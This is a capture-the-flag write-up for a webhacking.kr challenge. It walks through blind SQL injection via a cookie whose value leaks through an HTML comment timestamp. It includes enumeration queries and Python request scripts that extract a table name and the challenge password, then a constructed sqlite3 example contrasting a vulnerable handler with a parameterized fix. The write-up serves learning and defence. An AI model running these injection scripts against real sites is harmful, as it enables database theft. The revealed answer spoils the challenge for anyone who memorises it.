Problem
if you access admin.php ~
webhacking.kr/challenge/web-02/admin.php
Opening that URL shows the admin.php page.
The challenge is solved once the password is found.
Solution
To find the password, go back to the previous page.
Changing the cookie value changes the HTML comment in the response:
<!--
2022-10-30 06:43:47
-->
<!--
2070-01-01 09:00:01
-->
The comment timestamp moves by the number of seconds the cookie value evaluates to, so SQL injection through the cookie is possible (a blind, value-encoded oracle).
SQLI - checking the number of tables
select count(table_name) from information_schema.tables where table_schema=database()
<!--
2070-01-01 09:00:02
-->
SQLI - checking the table name lengths
select length(table_name) from information_schema.tables where table_schema=database() limit 0,1
<!--
2070-01-01 09:00:13
-->
select length(table_name) from information_schema.tables where table_schema=database() limit 1,1
<!--
2070-01-01 09:00:03
-->
SQLI - checking the second table name
select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema=database() limit 1,1
<!--
2070-01-01 09:01:48
-->
108->'l'
select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema=database() limit 1,1
<!--
2070-01-01 09:01:51
-->
111->'o'
select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema=database() limit 1,1
<!--
2070-01-01 09:01:43
-->
103->'g'
SQLI - checking the first table name
select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema=database() limit 0,1
<!--
2070-01-01 09:01:37
-->
97->'a'
select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema=database() limit 0,1
<!--
2070-01-01 09:01:40
-->
100->'d'
select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema=database() limit 0,1
<!--
2070-01-01 09:01:49
-->
109->'m'
select ascii(substr(table_name,13,1)) from information_schema.tables where table_schema=database() limit 0,1
<!--
2070-01-01 09:01:59
-->
119->'w'
import requests

def time(res):
    # The response starts with "<!--\n2070-01-01 09:MM:SS\n-->":
    # index 20 is the ones digit of the minutes, 22 and 23 are the seconds,
    # so the leaked value is minutes*60 + seconds past 09:00:00.
    val = 0
    val += int(res.text[20]) * 60
    val += int(res.text[22]) * 10
    val += int(res.text[23])
    return val

url = "https://webhacking.kr/challenge/web-02/"
cookies = {'PHPSESSID': '쿠키값'}  # your own session cookie
name = ""
for i in range(1, 14):  # the first table name is 13 characters long
    cookies['time'] = "(select ascii(substr(table_name,{},1)) from information_schema.tables where table_schema=database() limit 0,1)".format(i)
    res = requests.get(url, cookies=cookies)
    name += chr(time(res))
print(name)
# admin_area_pw
SQLI - checking the number of columns
select count(column_name) from information_schema.columns where table_name="admin_area_pw"
<!--
2070-01-01 09:00:01
-->
SQLI - checking the column name length
select length(column_name) from information_schema.columns where table_name="admin_area_pw" limit 0,1
<!--
2070-01-01 09:00:02
-->
SQLI - checking the column name
select ascii(substr(column_name,1,1)) from information_schema.columns where table_name="admin_area_pw" limit 0,1
<!--
2070-01-01 09:01:52
-->
112->'p'
select ascii(substr(column_name,2,1)) from information_schema.columns where table_name="admin_area_pw" limit 0,1
<!--
2070-01-01 09:01:59
-->
119->'w'
SQLI - checking the count and length of 'pw'
select count(pw) from admin_area_pw
<!--
2070-01-01 09:00:01
-->
select length(pw) from admin_area_pw
<!--
2070-01-01 09:00:17
-->
SQLI - checking the value of 'pw'
select ascii(substring(pw,{},1)) from admin_area_pw limit 0,1
import requests

def time(res):
    # Same decoder as above: minutes*60 + seconds past 09:00:00 in the comment.
    val = 0
    val += int(res.text[20]) * 60
    val += int(res.text[22]) * 10
    val += int(res.text[23])
    return val

url = "https://webhacking.kr/challenge/web-02/"
cookies = {'PHPSESSID': ''}  # your own session cookie
name = ""
for i in range(1, 18):  # pw is 17 characters long
    cookies['time'] = "(select ascii(substr(pw,{},1)) from admin_area_pw)".format(i)
    res = requests.get(url, cookies=cookies)
    name += chr(time(res))
print(name)
# kudos_to_beistlab
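Why this oracle exists and how it is closed, as an added example that is not the challenge's own source (admin.php is not shown on the page): a constructed sqlite3 stand-in whose vulnerable handler splices the time cookie into the query, next to a hardened handler that only accepts an integer and binds it as a parameter. The table contents, the BASE timestamp and the default value are assumptions chosen to match the behaviour observed above.

```python
import re
import sqlite3
from datetime import datetime, timedelta

# Assumption: the comment shows 2070-01-01 09:00:00 plus the cookie value in seconds.
BASE = datetime(2070, 1, 1, 9, 0, 0)
COMMENT_RE = re.compile(r"<!--\s*\d{4}-\d{2}-\d{2} (\d{2}):(\d{2}):(\d{2})\s*-->")

def make_db():
    """In-memory database with a constructed table shaped like the write-up's."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table admin_area_pw (pw text)")
    conn.execute("insert into admin_area_pw values ('constructed_pw')")  # constructed
    return conn

def render_vulnerable(conn, time_cookie):
    """Vulnerable: the cookie text is spliced into the SQL, so a parenthesised
    subquery runs and its result leaks through the timestamp."""
    seconds = int(conn.execute(f"select {time_cookie}").fetchone()[0])
    stamp = (BASE + timedelta(seconds=seconds)).strftime("%Y-%m-%d %H:%M:%S")
    return f"<!--\n{stamp}\n-->"

def render_hardened(conn, time_cookie, default=1):
    """Hardened: accept only a small non-negative integer and bind it as a
    parameter; anything else falls back to the default, so no SQL is evaluated."""
    if not re.fullmatch(r"\d{1,6}", time_cookie or ""):
        time_cookie = str(default)
    seconds = conn.execute("select ?", (int(time_cookie),)).fetchone()[0]
    stamp = (BASE + timedelta(seconds=seconds)).strftime("%Y-%m-%d %H:%M:%S")
    return f"<!--\n{stamp}\n-->"

def decode_seconds(html):
    """Seconds past 09:00:00 in the comment (None if absent). Same idea as the
    write-up's time(), but it does not depend on fixed character positions."""
    m = COMMENT_RE.search(html)
    if not m:
        return None
    h, mi, s = (int(x) for x in m.groups())
    return (h - 9) * 3600 + mi * 60 + s

if __name__ == "__main__":
    db = make_db()
    probe = "(select length(pw) from admin_area_pw)"  # the write-up's length probe
    print(decode_seconds(render_vulnerable(db, probe)))  # 14: the length leaks
    print(decode_seconds(render_hardened(db, probe)))    # 1: default, nothing leaks
```

sqlite3 has no ascii(), so a per-character probe against this stand-in uses unicode() instead; MySQL's information_schema queries from the write-up would not run here either, the point is the handler, not the schema.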